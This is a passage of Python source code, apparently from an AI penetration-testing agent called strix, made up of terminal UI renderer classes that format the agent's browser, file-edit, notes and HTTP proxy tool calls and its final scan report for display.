text.append(str(finding), style=\"dim\")\n else:\n text.append(\"\\n \")\n text.append(\"Completing task...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass WaitForMessageRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"wait_for_message\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"agents-graph-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"unknown\")\n\n reason = args.get(\"reason\", \"\")\n\n text = Text()\n text.append(\"β—‹ \", style=\"#6b7280\")\n text.append(\"waiting\", style=\"dim\")\n\n if reason:\n text.append(\"\\n \")\n text.append(reason, style=\"dim\")\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/base_renderer.py", "content": "from abc import ABC, abstractmethod\nfrom typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\n\nclass BaseToolRenderer(ABC):\n tool_name: ClassVar[str] = \"\"\n css_classes: ClassVar[list[str]] = [\"tool-call\"]\n\n @classmethod\n @abstractmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n pass\n\n @classmethod\n def build_text(cls, tool_data: dict[str, Any]) -> Text: # noqa: ARG003\n return Text()\n\n @classmethod\n def create_static(cls, content: Text, status: str) -> Static:\n css_classes = cls.get_css_classes(status)\n return Static(content, classes=css_classes)\n\n @classmethod\n def status_icon(cls, status: str) -> tuple[str, str]:\n icons = {\n \"running\": (\"● In progress...\", \"#f59e0b\"),\n \"completed\": (\"βœ“ Done\", \"#22c55e\"),\n \"failed\": (\"βœ— Failed\", \"#dc2626\"),\n \"error\": (\"βœ— Error\", \"#dc2626\"),\n }\n return icons.get(status, (\"β—‹ Unknown\", \"dim\"))\n\n @classmethod\n def get_css_classes(cls, status: str) -> str:\n base_classes = cls.css_classes.copy()\n base_classes.append(f\"status-{status}\")\n return \" \".join(base_classes)\n\n @classmethod\n def text_with_style(cls, content: str, style: str | None = None) -> Text:\n text = Text()\n text.append(content, style=style)\n return text\n\n @classmethod\n def text_icon_label(\n cls,\n icon: str,\n label: str,\n icon_style: str | None = None,\n label_style: str | None = None,\n ) -> Text:\n text = Text()\n text.append(icon, style=icon_style)\n text.append(\" \")\n text.append(label, style=label_style)\n return text\n\n @classmethod\n def text_header(\n cls,\n icon: str,\n title: str,\n subtitle: str = \"\",\n title_style: str = \"bold\",\n subtitle_style: str = \"dim\",\n ) -> Text:\n text = Text()\n text.append(icon)\n text.append(\" \")\n text.append(title, style=title_style)\n if subtitle:\n text.append(\" \")\n text.append(subtitle, style=subtitle_style)\n return text\n\n @classmethod\n def text_key_value(\n cls,\n key: str,\n value: str,\n key_style: str = \"dim\",\n value_style: str | None = None,\n indent: int = 2,\n ) -> Text:\n text = Text()\n text.append(\" \" * indent)\n text.append(key, style=key_style)\n text.append(\": \")\n text.append(value, style=value_style)\n return text\n" }, { "path": "strix/interface/tool_components/browser_renderer.py", "content": "from functools import cache\nfrom typing import Any, ClassVar\n\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.styles import get_style_by_name\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n@cache\ndef _get_style_colors() -> dict[Any, str]:\n style = get_style_by_name(\"native\")\n return {token: f\"#{style_def['color']}\" for token, style_def in style if style_def[\"color\"]}\n\n\n@register_tool_renderer\nclass BrowserRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"browser_action\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"browser-tool\"]\n\n SIMPLE_ACTIONS: ClassVar[dict[str, str]] = {\n \"back\": \"going back in browser history\",\n \"forward\": \"going forward in browser history\",\n \"scroll_down\": \"scrolling down\",\n \"scroll_up\": \"scrolling up\",\n \"refresh\": \"refreshing browser tab\",\n \"close_tab\": \"closing browser tab\",\n \"switch_tab\": \"switching browser tab\",\n \"list_tabs\": \"listing browser tabs\",\n \"view_source\": \"viewing page source\",\n \"get_console_logs\": \"getting console logs\",\n \"screenshot\": \"taking screenshot of browser tab\",\n \"wait\": \"waiting...\",\n \"close\": \"closing browser\",\n }\n\n @classmethod\n def _get_token_color(cls, token_type: Any) -> str | None:\n colors = _get_style_colors()\n while token_type:\n if token_type in colors:\n return colors[token_type]\n token_type = token_type.parent\n return None\n\n @classmethod\n def _highlight_js(cls, code: str) -> Text:\n lexer = get_lexer_by_name(\"javascript\")\n text = Text()\n\n for token_type, token_value in lexer.get_tokens(code):\n if not token_value:\n continue\n color = cls._get_token_color(token_type)\n text.append(token_value, style=color)\n\n return text\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"unknown\")\n\n action = args.get(\"action\", \"\")\n content = cls._build_content(action, args)\n\n css_classes = cls.get_css_classes(status)\n return Static(content, classes=css_classes)\n\n @classmethod\n def _build_url_action(cls, text: Text, label: str, url: str | None, suffix: str = \"\") -> None:\n text.append(label, style=\"#06b6d4\")\n if url:\n text.append(url, style=\"#06b6d4\")\n if suffix:\n text.append(suffix, style=\"#06b6d4\")\n\n @classmethod\n def _build_content(cls, action: str, args: dict[str, Any]) -> Text:\n text = Text()\n text.append(\"🌐 \")\n\n if action in cls.SIMPLE_ACTIONS:\n text.append(cls.SIMPLE_ACTIONS[action], style=\"#06b6d4\")\n return text\n\n url = args.get(\"url\")\n\n url_actions = {\n \"launch\": (\"launching \", \" on browser\" if url else \"browser\"),\n \"goto\": (\"navigating to \", \"\"),\n \"new_tab\": (\"opening tab \", \"\"),\n }\n if action in url_actions:\n label, suffix = url_actions[action]\n if action == \"launch\" and not url:\n text.append(\"launching browser\", style=\"#06b6d4\")\n else:\n cls._build_url_action(text, label, url, suffix)\n return text\n\n click_actions = {\n \"click\": \"clicking\",\n \"double_click\": \"double clicking\",\n \"hover\": \"hovering\",\n }\n if action in click_actions:\n text.append(click_actions[action], style=\"#06b6d4\")\n return text\n\n handlers: dict[str, tuple[str, str | None]] = {\n \"type\": (\"typing \", args.get(\"text\")),\n \"press_key\": (\"pressing key \", args.get(\"key\")),\n \"save_pdf\": (\"saving PDF to \", args.get(\"file_path\")),\n }\n if action in handlers:\n label, value = handlers[action]\n text.append(label, style=\"#06b6d4\")\n if value:\n text.append(str(value), style=\"#06b6d4\")\n return text\n\n if action == \"execute_js\":\n text.append(\"executing javascript\", style=\"#06b6d4\")\n js_code = args.get(\"js_code\")\n if js_code:\n text.append(\"\\n\")\n text.append_text(cls._highlight_js(js_code))\n return text\n\n if action:\n text.append(action, style=\"#06b6d4\")\n return text\n" }, { "path": "strix/interface/tool_components/file_edit_renderer.py", "content": "from functools import cache\nfrom typing import Any, ClassVar\n\nfrom pygments.lexers import get_lexer_by_name, get_lexer_for_filename\nfrom pygments.styles import get_style_by_name\nfrom pygments.util import ClassNotFound\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n@cache\ndef _get_style_colors() -> dict[Any, str]:\n style = get_style_by_name(\"native\")\n return {token: f\"#{style_def['color']}\" for token, style_def in style if style_def[\"color\"]}\n\n\ndef _get_lexer_for_file(path: str) -> Any:\n try:\n return get_lexer_for_filename(path)\n except ClassNotFound:\n return get_lexer_by_name(\"text\")\n\n\n@register_tool_renderer\nclass StrReplaceEditorRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"str_replace_editor\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"file-edit-tool\"]\n\n @classmethod\n def _get_token_color(cls, token_type: Any) -> str | None:\n colors = _get_style_colors()\n while token_type:\n if token_type in colors:\n return colors[token_type]\n token_type = token_type.parent\n return None\n\n @classmethod\n def _highlight_code(cls, code: str, path: str) -> Text:\n lexer = _get_lexer_for_file(path)\n text = Text()\n\n for token_type, token_value in lexer.get_tokens(code):\n if not token_value:\n continue\n color = cls._get_token_color(token_type)\n text.append(token_value, style=color)\n\n return text\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n result = tool_data.get(\"result\")\n\n command = args.get(\"command\", \"\")\n path = args.get(\"path\", \"\")\n old_str = args.get(\"old_str\", \"\")\n new_str = args.get(\"new_str\", \"\")\n file_text = args.get(\"file_text\", \"\")\n\n text = Text()\n\n icons_and_labels = {\n \"view\": (\"β—‡ \", \"read\", \"#10b981\"),\n \"str_replace\": (\"β—‡ \", \"edit\", \"#10b981\"),\n \"create\": (\"β—‡ \", \"create\", \"#10b981\"),\n \"insert\": (\"β—‡ \", \"insert\", \"#10b981\"),\n \"undo_edit\": (\"β—‡ \", \"undo\", \"#10b981\"),\n }\n\n icon, label, color = icons_and_labels.get(command, (\"β—‡ \", \"file\", \"#10b981\"))\n text.append(icon, style=color)\n text.append(label, style=\"dim\")\n\n if path:\n path_display = path[-60:] if len(path) > 60 else path\n text.append(\" \")\n text.append(path_display, style=\"dim\")\n\n if command == \"str_replace\" and (old_str or new_str):\n if old_str:\n highlighted_old = cls._highlight_code(old_str, path)\n for line in highlighted_old.plain.split(\"\\n\"):\n text.append(\"\\n\")\n text.append(\"-\", style=\"#ef4444\")\n text.append(\" \")\n text.append(line)\n\n if new_str:\n highlighted_new = cls._highlight_code(new_str, path)\n for line in highlighted_new.plain.split(\"\\n\"):\n text.append(\"\\n\")\n text.append(\"+\", style=\"#22c55e\")\n text.append(\" \")\n text.append(line)\n\n elif command == \"create\" and file_text:\n text.append(\"\\n\")\n text.append_text(cls._highlight_code(file_text, path))\n\n elif command == \"insert\" and new_str:\n highlighted_new = cls._highlight_code(new_str, path)\n for line in highlighted_new.plain.split(\"\\n\"):\n text.append(\"\\n\")\n text.append(\"+\", style=\"#22c55e\")\n text.append(\" \")\n text.append(line)\n\n elif isinstance(result, str) and result.strip():\n text.append(\"\\n \")\n text.append(result.strip(), style=\"dim\")\n elif not (result and isinstance(result, dict) and \"content\" in result) and not path:\n text.append(\" \")\n text.append(\"Processing...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass ListFilesRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"list_files\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"file-edit-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n path = args.get(\"path\", \"\")\n\n text = Text()\n text.append(\"β—‡ \", style=\"#10b981\")\n text.append(\"list\", style=\"dim\")\n text.append(\" \")\n\n if path:\n path_display = path[-60:] if len(path) > 60 else path\n text.append(path_display, style=\"dim\")\n else:\n text.append(\"Current directory\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass SearchFilesRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"search_files\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"file-edit-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n path = args.get(\"path\", \"\")\n regex = args.get(\"regex\", \"\")\n\n text = Text()\n text.append(\"β—‡ \", style=\"#a855f7\")\n text.append(\"search\", style=\"dim\")\n text.append(\" \")\n\n if path and regex:\n text.append(path, style=\"dim\")\n text.append(\" \", style=\"dim\")\n text.append(regex, style=\"#a855f7\")\n elif path:\n text.append(path, style=\"dim\")\n elif regex:\n text.append(regex, style=\"#a855f7\")\n else:\n text.append(\"...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/finish_renderer.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\nFIELD_STYLE = \"bold #4ade80\"\n\n\n@register_tool_renderer\nclass FinishScanRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"finish_scan\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"finish-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n\n executive_summary = args.get(\"executive_summary\", \"\")\n methodology = args.get(\"methodology\", \"\")\n technical_analysis = args.get(\"technical_analysis\", \"\")\n recommendations = args.get(\"recommendations\", \"\")\n\n text = Text()\n text.append(\"β—† \", style=\"#22c55e\")\n text.append(\"Penetration test completed\", style=\"bold #22c55e\")\n\n if executive_summary:\n text.append(\"\\n\\n\")\n text.append(\"Executive Summary\", style=FIELD_STYLE)\n text.append(\"\\n\")\n text.append(executive_summary)\n\n if methodology:\n text.append(\"\\n\\n\")\n text.append(\"Methodology\", style=FIELD_STYLE)\n text.append(\"\\n\")\n text.append(methodology)\n\n if technical_analysis:\n text.append(\"\\n\\n\")\n text.append(\"Technical Analysis\", style=FIELD_STYLE)\n text.append(\"\\n\")\n text.append(technical_analysis)\n\n if recommendations:\n text.append(\"\\n\\n\")\n text.append(\"Recommendations\", style=FIELD_STYLE)\n text.append(\"\\n\")\n text.append(recommendations)\n\n if not (executive_summary or methodology or technical_analysis or recommendations):\n text.append(\"\\n \")\n text.append(\"Generating final report...\", style=\"dim\")\n\n padded = Text()\n padded.append(\"\\n\\n\")\n padded.append_text(text)\n padded.append(\"\\n\\n\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(padded, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/load_skill_renderer.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n@register_tool_renderer\nclass LoadSkillRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"load_skill\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"load-skill-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"completed\")\n\n requested = args.get(\"skills\", \"\")\n\n text = Text()\n text.append(\"β—‡ \", style=\"#10b981\")\n text.append(\"loading skill\", style=\"dim\")\n\n if requested:\n text.append(\" \")\n text.append(requested, style=\"#10b981\")\n elif not tool_data.get(\"result\"):\n text.append(\"\\n \")\n text.append(\"Loading...\", style=\"dim\")\n\n return Static(text, classes=cls.get_css_classes(status))\n" }, { "path": "strix/interface/tool_components/notes_renderer.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n@register_tool_renderer\nclass CreateNoteRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"create_note\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"notes-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n\n title = args.get(\"title\", \"\")\n content = args.get(\"content\", \"\")\n category = args.get(\"category\", \"general\")\n\n text = Text()\n text.append(\"β—‡ \", style=\"#fbbf24\")\n text.append(\"note\", style=\"dim\")\n text.append(\" \")\n text.append(f\"({category})\", style=\"dim\")\n\n if title:\n text.append(\"\\n \")\n text.append(title.strip())\n\n if content:\n text.append(\"\\n \")\n text.append(content.strip(), style=\"dim\")\n\n if not title and not content:\n text.append(\"\\n \")\n text.append(\"Capturing...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass DeleteNoteRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"delete_note\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"notes-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: ARG003\n text = Text()\n text.append(\"β—‡ \", style=\"#fbbf24\")\n text.append(\"note removed\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass UpdateNoteRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"update_note\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"notes-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n\n title = args.get(\"title\")\n content = args.get(\"content\")\n\n text = Text()\n text.append(\"β—‡ \", style=\"#fbbf24\")\n text.append(\"note updated\", style=\"dim\")\n\n if title:\n text.append(\"\\n \")\n text.append(title)\n\n if content:\n text.append(\"\\n \")\n text.append(content.strip(), style=\"dim\")\n\n if not title and not content:\n text.append(\"\\n \")\n text.append(\"Updating...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass ListNotesRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"list_notes\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"notes-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n result = tool_data.get(\"result\")\n\n text = Text()\n text.append(\"β—‡ \", style=\"#fbbf24\")\n text.append(\"notes\", style=\"dim\")\n\n if isinstance(result, str) and result.strip():\n text.append(\"\\n \")\n text.append(result.strip(), style=\"dim\")\n elif result and isinstance(result, dict) and result.get(\"success\"):\n count = result.get(\"total_count\", 0)\n notes = result.get(\"notes\", []) or []\n\n if count == 0:\n text.append(\"\\n \")\n text.append(\"No notes\", style=\"dim\")\n else:\n for note in notes:\n title = note.get(\"title\", \"\").strip() or \"(untitled)\"\n category = note.get(\"category\", \"general\")\n note_content = note.get(\"content\", \"\").strip()\n\n text.append(\"\\n - \")\n text.append(title)\n text.append(f\" ({category})\", style=\"dim\")\n\n if note_content:\n text.append(\"\\n \")\n text.append(note_content, style=\"dim\")\n else:\n text.append(\"\\n \")\n text.append(\"Loading...\", style=\"dim\")\n\n css_classes = cls.get_css_classes(\"completed\")\n return Static(text, classes=css_classes)\n" }, { "path": "strix/interface/tool_components/proxy_renderer.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\nPROXY_ICON = \"<~>\"\nMAX_REQUESTS_DISPLAY = 20\nMAX_LINE_LENGTH = 200\n\n\ndef _truncate(text: str, max_len: int = 80) -> str:\n return text[: max_len - 3] + \"...\" if len(text) > max_len else text\n\n\ndef _sanitize(text: str, max_len: int = 150) -> str:\n \"\"\"Remove newlines and truncate text.\"\"\"\n clean = text.replace(\"\\n\", \" \").replace(\"\\r\", \"\").replace(\"\\t\", \" \")\n return _truncate(clean, max_len)\n\n\ndef _status_style(code: int | None) -> str:\n if code is None:\n return \"dim\"\n if 200 <= code < 300:\n return \"#22c55e\" # green\n if 300 <= code < 400:\n return \"#eab308\" # yellow\n if 400 <= code < 500:\n return \"#f97316\" # orange\n if code >= 500:\n return \"#ef4444\" # red\n return \"dim\"\n\n\n@register_tool_renderer\nclass ListRequestsRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"list_requests\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"proxy-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: PLR0912 # noqa: PLR0912\n args = tool_data.get(\"args\", {})\n result = tool_data.get(\"result\")\n status = tool_data.get(\"status\", \"running\")\n\n httpql_filter = args.get(\"httpql_filter\")\n sort_by = args.get(\"sort_by\")\n sort_order = args.get(\"sort_order\")\n scope_id = args.get(\"scope_id\")\n\n text = Text()\n text.append(PROXY_ICON, style=\"dim\")\n text.append(\" listing requests\", style=\"#06b6d4\")\n\n if httpql_filter:\n text.append(f\" where {_truncate(httpql_filter, 150)}\", style=\"dim italic\")\n\n meta_parts = []\n if sort_by and sort_by != \"timestamp\":\n meta_parts.append(f\"by:{sort_by}\")\n if sort_order and sort_order != \"desc\":\n meta_parts.append(sort_order)\n if scope_id and isinstance(scope_id, str):\n meta_parts.append(f\"scope:{scope_id[:8]}\")\n if meta_parts:\n text.append(f\" ({', '.join(meta_parts)})\", style=\"dim\")\n\n if status == \"completed\" and isinstance(result, dict):\n if \"error\" in result:\n text.append(f\" error: {_sanitize(str(result['error']), 150)}\", style=\"#ef4444\")\n else:\n total = result.get(\"total_count\", 0)\n requests = result.get(\"requests\", [])\n\n text.append(f\" [{total} found]\", style=\"dim\")\n\n if requests and isinstance(requests, list):\n text.append(\"\\n\")\n for i, req in enumerate(requests[:MAX_REQUESTS_DISPLAY]):\n if not isinstance(req, dict):\n continue\n method = req.get(\"method\", \"?\")\n host = req.get(\"host\", \"\")\n path = req.get(\"path\", \"/\")\n resp = req.get(\"response\") or {}\n code = resp.get(\"statusCode\") if isinstance(resp, dict) else None\n\n text.append(\" \")\n text.append(f\"{method:6}\", style=\"#a78bfa\")\n text.append(f\" {_truncate(host + path, 180)}\", style=\"dim\")\n if code:\n text.append(f\" {code}\", style=_status_style(code))\n\n if i < min(len(requests), MAX_REQUESTS_DISPLAY) - 1:\n text.append(\"\\n\")\n\n if len(requests) > MAX_REQUESTS_DISPLAY:\n text.append(\"\\n\")\n text.append(\n f\" ... +{len(requests) - MAX_REQUESTS_DISPLAY} more\",\n style=\"dim italic\",\n )\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass ViewRequestRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"view_request\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"proxy-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: PLR0912, PLR0915\n args = tool_data.get(\"args\", {})\n result = tool_data.get(\"result\")\n status = tool_data.get(\"status\", \"running\")\n\n request_id = args.get(\"request_id\", \"\")\n part = args.get(\"part\", \"request\")\n search_pattern = args.get(\"search_pattern\")\n\n text = Text()\n text.append(PROXY_ICON, style=\"dim\")\n\n action = \"searching\" if search_pattern else \"viewing\"\n text.append(f\" {action} {part}\", style=\"#06b6d4\")\n\n if request_id:\n text.append(f\" #{request_id}\", style=\"dim\")\n\n if search_pattern:\n text.append(f\" /{_truncate(search_pattern, 100)}/\", style=\"dim italic\")\n\n if status == \"completed\" and isinstance(result, dict):\n if \"error\" in result:\n text.append(f\" error: {_sanitize(str(result['error']), 150)}\", style=\"#ef4444\")\n elif \"matches\" in result:\n matches = result.get(\"matches\", [])\n total = result.get(\"total_matches\", len(matches))\n text.append(f\" [{total} matches]\", style=\"dim\")\n\n if matches and isinstance(matches, list):\n text.append(\"\\n\")\n for i, m in enumerate(matches[:5]):\n if not isinstance(m, dict):\n continue\n before = m.get(\"before\", \"\") or \"\"\n match_text = m.get(\"match\", \"\") or \"\"\n after = m.get(\"after\", \"\") or \"\"\n\n before = before.replace(\"\\n\", \" \").replace(\"\\r\", \"\")[-100:]\n after = after.replace(\"\\n\", \" \").replace(\"\\r\", \"\")[:100]\n\n text.append(\" \")\n\n if before:\n text.append(f\"...{before}\", style=\"dim\")\n text.append(match_text, style=\"#22c55e bold\")\n if after:\n text.append(f\"{after}...\", style=\"dim\")\n\n if i < min(len(matches), 5) - 1:\n text.append(\"\\n\")\n\n if len(matches) > 5:\n text.append(\"\\n\")\n text.append(f\" ... +{len(matches) - 5} more matches\", style=\"dim italic\")\n\n elif \"content\" in result:\n showing = result.get(\"showing_lines\", \"\")\n has_more = result.get(\"has_more\", False)\n content = result.get(\"content\", \"\")\n\n text.append(f\" [{showing}]\", style=\"dim\")\n\n if content and isinstance(content, str):\n lines = content.split(\"\\n\")[:15]\n text.append(\"\\n\")\n for i, line in enumerate(lines):\n text.append(\" \")\n text.append(_truncate(line, MAX_LINE_LENGTH), style=\"dim\")\n if i < len(lines) - 1:\n text.append(\"\\n\")\n\n if has_more or len(lines) > 15:\n text.append(\"\\n\")\n text.append(\" ... more content available\", style=\"dim italic\")\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass SendRequestRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"send_request\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"proxy-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: PLR0912, PLR0915\n args = tool_data.get(\"args\", {})\n result = tool_data.get(\"result\")\n status = tool_data.get(\"status\", \"running\")\n\n method = args.get(\"method\", \"GET\")\n url = args.get(\"url\", \"\")\n req_headers = args.get(\"headers\")\n req_body = args.get(\"body\", \"\")\n\n text = Text()\n text.append(PROXY_ICON, style=\"dim\")\n text.append(\" sending request\", style=\"#06b6d4\")\n\n text.append(\"\\n\")\n text.append(\" >> \", style=\"#3b82f6\")\n text.append(method, style=\"#a78bfa\")\n text.append(f\" {_truncate(url, 180)}\", style=\"dim\")\n\n if req_headers and isinstance(req_headers, dict):\n for k, v in list(req_headers.items())[:5]:\n text.append(\"\\n\")\n text.append(\" >> \", style=\"#3b82f6\")\n text.append(f\"{k}: \", style=\"dim\")\n text.append(_sanitize(str(v), 150), style=\"dim\")\n\n if req_body and isinstance(req_body, str):\n text.append(\"\\n\")\n text.append(\" >> \", style=\"#3b82f6\")\n body_lines = req_body.split(\"\\n\")[:4]\n for i, line in enumerate(body_lines):\n if i > 0:\n text.append(\"\\n\")\n text.append(\" \", style=\"dim\")\n text.append(_truncate(line, MAX_LINE_LENGTH), style=\"dim\")\n if len(req_body.split(\"\\n\")) > 4:\n text.append(\" ...\", style=\"dim italic\")\n\n if status == \"completed\" and isinstance(result, dict):\n if \"error\" in result:\n text.append(f\"\\n error: {_sanitize(str(result['error']), 150)}\", style=\"#ef4444\")\n else:\n code = result.get(\"status_code\")\n time_ms = result.get(\"response_time_ms\")\n\n text.append(\"\\n\")\n text.append(\" << \", style=\"#22c55e\")\n if code:\n text.append(f\"{code}\", style=_status_style(code))\n if time_ms:\n text.append(f\" ({time_ms}ms)\", style=\"dim\")\n\n body = result.get(\"body\", \"\")\n if body and isinstance(body, str):\n lines = body.split(\"\\n\")[:6]\n for line in lines:\n text.append(\"\\n\")\n text.append(\" << \", style=\"#22c55e\")\n text.append(_truncate(line, MAX_LINE_LENGTH - 5), style=\"dim\")\n\n if len(body.split(\"\\n\")) > 6:\n text.append(\"\\n\")\n text.append(\" ...\", style=\"dim italic\")\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass RepeatRequestRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"repeat_request\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"proxy-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: PLR0912, PLR0915\n args = tool_data.get(\"args\", {})\n result = tool_data.get(\"result\")\n status = tool_data.get(\"status\", \"running\")\n\n request_id = args.get(\"request_id\", \"\")\n modifications = args.get(\"modifications\")\n\n text = Text()\n text.append(PROXY_ICON, style=\"dim\")\n text.append(\" repeating request\", style=\"#06b6d4\")\n\n if request_id:\n text.append(f\" #{request_id}\", style=\"dim\")\n\n if modifications and isinstance(modifications, dict):\n text.append(\"\\n modifications:\", style=\"dim italic\")\n\n if \"url\" in modifications:\n text.append(\"\\n\")\n text.append(\" >> \", style=\"#3b82f6\")\n text.append(f\"url: {_truncate(str(modifications['url']), 180)}\", style=\"dim\")\n\n if \"headers\" in modifications and isinstance(modifications[\"headers\"], dict):\n for k, v in list(modifications[\"headers\"].items())[:5]:\n text.append(\"\\n\")\n text.append(\" >> \", style=\"#3b82f6\")\n text.append(f\"{k}: {_sanitize(str(v), 150)}\", style=\"dim\")\n\n if \"cookies\" in modifications and isinstance(modifications[\"cookies\"], dict):\n for k, v in list(modifications[\"cookies\"].items())[:5]:\n text.append(\"\\n\")\n text.append(\" >> \", style=\"#3b82f6\")\n text.append(f\"cookie {k}={_sanitize(str(v), 100)}\", style=\"dim\")\n\n if \"params\" in modifications and isinstance(modifications[\"params\"], dict):\n for k, v in list(modifications[\"params\"].items())[:5]:\n text.append(\"\\n\")\n text.append(\" >> \", style=\"#3b82f6\")\n text.append(f\"param {k}={_sanitize(str(v), 100)}\", style=\"dim\")\n\n if \"body\" in modifications and isinstance(modifications[\"body\"], str):\n text.append(\"\\n\")\n text.append(\" >> \", style=\"#3b82f6\")\n body_lines = modifications[\"body\"].split(\"\\n\")[:4]\n for i, line in enumerate(body_lines):\n if i > 0:\n text.append(\"\\n\")\n text.append(\" \", style=\"dim\")\n text.append(_truncate(line, MAX_LINE_LENGTH), style=\"dim\")\n if len(modifications[\"body\"].split(\"\\n\")) > 4:\n text.append(\" ...\", style=\"dim italic\")\n\n elif modifications and isinstance(modifications, str):\n text.append(f\"\\n {_truncate(modifications, 200)}\", style=\"dim italic\")\n\n if status == \"completed\" and isinstance(result, dict):\n if \"error\" in result:\n text.append(f\"\\n error: {_sanitize(str(result['error']), 150)}\", style=\"#ef4444\")\n else:\n req = result.get(\"request\", {})\n method = req.get(\"method\", \"\")\n url = req.get(\"url\", \"\")\n code = result.get(\"status_code\")\n time_ms = result.get(\"response_time_ms\")\n\n text.append(\"\\n\")\n text.append(\" >> \", style=\"#3b82f6\")\n if method:\n text.append(f\"{method} \", style=\"#a78bfa\")\n if url:\n text.append(_truncate(url, 180), style=\"dim\")\n\n text.append(\"\\n\")\n text.append(\" << \", 